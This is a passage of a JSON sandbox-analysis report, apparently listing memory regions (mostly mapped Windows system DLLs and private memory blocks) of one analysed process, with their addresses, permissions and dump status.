"readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1976172544, "type": "region", "version": 1 }, "end_va": 1989058559, "entry_point": 1976172544, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1006", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1976172544, "timestamp": "00:01:24.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1970274304, "type": "region", "version": 1 }, "end_va": 1970319359, "entry_point": 1970274304, "filename": "\\Windows\\SysWOW64\\profapi.dll", "id": "region_1007", "name": "profapi.dll", "norm_filename": "c:\\windows\\syswow64\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1970274304, "timestamp": "00:01:24.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970434047, "entry_point": 1970339840, "filename": "\\Windows\\SysWOW64\\userenv.dll", "id": "region_1008", "name": "userenv.dll", "norm_filename": "c:\\windows\\syswow64\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:01:24.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1843199, "entry_point": 0, "filename": null, "id": "region_1009", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:24.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1968570368, "type": "region", "version": 1 }, "end_va": 1970266111, "entry_point": 1968570368, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1010", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1968570368, "timestamp": "00:01:24.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_1011", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:01:25.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2498559, "entry_point": 0, "filename": null, "id": "region_1012", "name": "pagefile_0x0000000000260000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2490368, "timestamp": "00:01:25.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_1013", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:01:25.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33816576, "type": "region", "version": 1 }, "end_va": 34078719, "entry_point": 0, "filename": null, "id": "region_1014", "name": "private_0x0000000002040000", "norm_filename": null, "region_type": "private_memory", "start_va": 33816576, "timestamp": "00:01:25.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35127296, "type": "region", "version": 1 }, "end_va": 38072319, "entry_point": 35127296, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1015", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35127296, "timestamp": "00:01:25.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1968525311, "entry_point": 1967521792, "filename": "\\Windows\\SysWOW64\\propsys.dll", "id": "region_1016", "name": "propsys.dll", "norm_filename": "c:\\windows\\syswow64\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:01:25.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001017-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_233", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_1017", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:25.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1967325184, "type": "region", "version": 1 }, "end_va": 1967460351, "entry_point": 1967325184, "filename": "\\Windows\\SysWOW64\\ntmarta.dll", "id": "region_1018", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\syswow64\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1967325184, "timestamp": "00:01:25.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1998323712, "type": "region", "version": 1 }, "end_va": 1998606335, "entry_point": 1998323712, "filename": "\\Windows\\SysWOW64\\Wldap32.dll", "id": "region_1019", "name": "wldap32.dll", "norm_filename": "c:\\windows\\syswow64\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1998323712, "timestamp": "00:01:25.023", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1990066176, "type": "region", "version": 1 }, "end_va": 1990139903, "entry_point": 1990066176, "filename": "\\Windows\\SysWOW64\\devobj.dll", "id": "region_1020", "name": "devobj.dll", "norm_filename": "c:\\windows\\syswow64\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1990066176, "timestamp": "00:01:25.033", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1996619776, "type": "region", "version": 1 }, "end_va": 1998311423, "entry_point": 1996619776, "filename": "\\Windows\\SysWOW64\\setupapi.dll", "id": "region_1021", "name": "setupapi.dll", "norm_filename": "c:\\windows\\syswow64\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1996619776, "timestamp": "00:01:25.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 2001534976, "type": "region", "version": 1 }, "end_va": 2001694719, "entry_point": 2001534976, "filename": "\\Windows\\SysWOW64\\cfgmgr32.dll", "id": "region_1022", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\syswow64\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 2001534976, "timestamp": "00:01:25.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2625535, "entry_point": 0, "filename": null, "id": "region_1023", "name": "pagefile_0x0000000000280000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2621440, "timestamp": "00:01:25.247", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 110592, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3059711, "entry_point": 2949120, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db", "id": "region_1024", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "region_type": "memory_mapped_file", "start_va": 2949120, "timestamp": "00:01:25.247", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 32440320, "type": "region", "version": 1 }, "end_va": 32702463, "entry_point": 0, "filename": null, "id": "region_1025", "name": "private_0x0000000001ef0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32440320, "timestamp": "00:01:25.248", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 38076416, "type": "region", "version": 1 }, "end_va": 42217471, "entry_point": 0, "filename": null, "id": "region_1026", "name": "pagefile_0x0000000002450000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38076416, "timestamp": "00:01:25.248", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42336256, "type": "region", "version": 1 }, "end_va": 42598399, "entry_point": 0, "filename": null, "id": "region_1027", "name": "private_0x0000000002860000", "norm_filename": null, "region_type": "private_memory", "start_va": 42336256, "timestamp": "00:01:25.248", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1966997504, "type": "region", "version": 1 }, "end_va": 1967308799, "entry_point": 1966997504, "filename": "\\Windows\\SysWOW64\\apphelp.dll", "id": "region_1028", "name": "apphelp.dll", "norm_filename": "c:\\windows\\syswow64\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1966997504, "timestamp": "00:01:25.248", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001029-addr_0x000000007efd5000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_234", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_1029", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:25.254", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1966800896, "type": "region", "version": 1 }, "end_va": 1966989311, "entry_point": 1966800896, "filename": "\\Windows\\SysWOW64\\shdocvw.dll", "id": "region_1030", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\syswow64\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 1966800896, "timestamp": "00:01:25.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1966735360, "type": "region", "version": 1 }, "end_va": 1966772223, "entry_point": 1966735360, "filename": "\\Windows\\SysWOW64\\linkinfo.dll", "id": "region_1031", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\syswow64\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 1966735360, "timestamp": "00:01:25.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2572287, "entry_point": 2555904, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1032", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 2555904, "timestamp": "00:01:25.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3096575, "entry_point": 3080192, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1033", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 3080192, "timestamp": "00:01:25.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 5242880, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db", "id": "region_1034", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db", "region_type": "memory_mapped_file", "start_va": 5242880, "timestamp": "00:01:25.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5857279, "entry_point": 5439488, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1035", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 5439488, "timestamp": "00:01:25.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 458752, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966735359, "entry_point": 1966276608, "filename": "\\Windows\\SysWOW64\\ntshrui.dll", "id": "region_1036", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\syswow64\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:25.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966145536, "type": "region", "version": 1 }, "end_va": 1966247935, "entry_point": 1966145536, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_1037", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966145536, "timestamp": "00:01:25.882", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 32833536, "type": "region", "version": 1 }, "end_va": 33095679, "entry_point": 0, "filename": null, "id": "region_1038", "name": "private_0x0000000001f50000", "norm_filename": null, "region_type": "private_memory", "start_va": 32833536, "timestamp": "00:01:25.900", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 43712512, "type": "region", "version": 1 }, "end_va": 43974655, "entry_point": 0, "filename": null, "id": "region_1039", "name": "private_0x00000000029b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43712512, "timestamp": "00:01:25.901", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1966080000, "type": "region", "version": 1 }, "end_va": 1966125055, "entry_point": 1966080000, "filename": "\\Windows\\SysWOW64\\cscapi.dll", "id": "region_1040", "name": "cscapi.dll", "norm_filename": "c:\\windows\\syswow64\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 1966080000, "timestamp": "00:01:25.901", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001041-addr_0x000000007efad000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_235", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_1041", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:25.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1966014464, "type": "region", "version": 1 }, "end_va": 1966055423, "entry_point": 1966014464, "filename": "\\Windows\\SysWOW64\\slc.dll", "id": "region_1042", "name": "slc.dll", "norm_filename": "c:\\windows\\syswow64\\slc.dll", "region_type": "memory_mapped_file", "start_va": 1966014464, "timestamp": "00:01:25.910", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1965883392, "type": "region", "version": 1 }, "end_va": 1965973503, "entry_point": 1965883392, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_1043", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1965883392, "timestamp": "00:01:25.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1965621248, "type": "region", "version": 1 }, "end_va": 1965862911, "entry_point": 1965621248, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1044", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1965621248, "timestamp": "00:01:25.940", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 491520, "start_va": 1965096960, "type": "region", "version": 1 }, "end_va": 1965588479, "entry_point": 1965096960, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_1045", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1965096960, "timestamp": "00:01:26.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1966931968, "type": "region", "version": 1 }, "end_va": 1966968831, "entry_point": 1966931968, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_1046", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1966931968, "timestamp": "00:01:26.115", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 5898240, "type": "region", "version": 1 }, "end_va": 5902335, "entry_point": 0, "filename": null, "id": "region_1047", "name": "pagefile_0x00000000005a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5898240, "timestamp": "00:01:26.403", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001048-addr_0x0000000002af0000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_236", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 45023232, "type": "region", "version": 1 }, "end_va": 45285375, "entry_point": 0, "filename": null, "id": "region_1048", "name": "private_0x0000000002af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45023232, "timestamp": "00:01:26.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 634880, "start_va": 1958477824, "type": "region", "version": 1 }, "end_va": 1959112703, "entry_point": 1958477824, "filename": "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "id": "region_1049", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1958477824, "timestamp": "00:01:26.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5943296, "start_va": 1959133184, "type": "region", "version": 1 }, "end_va": 1965076479, "entry_point": 1959133184, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", "id": "region_1050", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 1959133184, "timestamp": "00:01:26.417", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 5967871, "entry_point": 0, "filename": null, "id": "region_1051", "name": "pagefile_0x00000000005b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5963776, "timestamp": "00:01:26.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 32374784, "type": "region", "version": 1 }, "end_va": 32378879, "entry_point": 0, "filename": null, "id": "region_1052", "name": "pagefile_0x0000000001ee0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32374784, "timestamp": "00:01:26.878", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001053-addr_0x0000000001f30000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_237", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32702464, "type": "region", "version": 1 }, "end_va": 32767999, "entry_point": 0, "filename": null, "id": "region_1053", "name": "private_0x0000000001f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 32702464, "timestamp": "00:01:26.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 32768000, "type": "region", "version": 1 }, "end_va": 32833535, "entry_point": 0, "filename": null, "id": "region_1054", "name": "private_0x0000000001f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 32768000, "timestamp": "00:01:26.879", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001055-addr_0x0000000001f90000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_238", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 33161215, "entry_point": 0, "filename": null, "id": "region_1055", "name": "private_0x0000000001f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 33095680, "timestamp": "00:01:26.879", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 33161216, "type": "region", "version": 1 }, "end_va": 33226751, "entry_point": 0, "filename": null, "id": "region_1056", "name": "private_0x0000000001fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33161216, "timestamp": "00:01:26.879", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001057-addr_0x0000000001ff0000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_239", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33488896, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1057", "name": "private_0x0000000001ff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33488896, "timestamp": "00:01:26.880", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001058-addr_0x0000000002000000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_240", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 33619967, "entry_point": 0, "filename": null, "id": "region_1058", "name": "private_0x0000000002000000", "norm_filename": null, "region_type": "private_memory", "start_va": 33554432, "timestamp": "00:01:26.880", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001059-addr_0x0000000002080000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_241", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 34078720, "type": "region", "version": 1 }, "end_va": 34734079, "entry_point": 0, "filename": null, "id": "region_1059", "name": "private_0x0000000002080000", "norm_filename": null, "region_type": "private_memory", "start_va": 34078720, "timestamp": "00:01:26.881", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001060-addr_0x0000000002130000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ 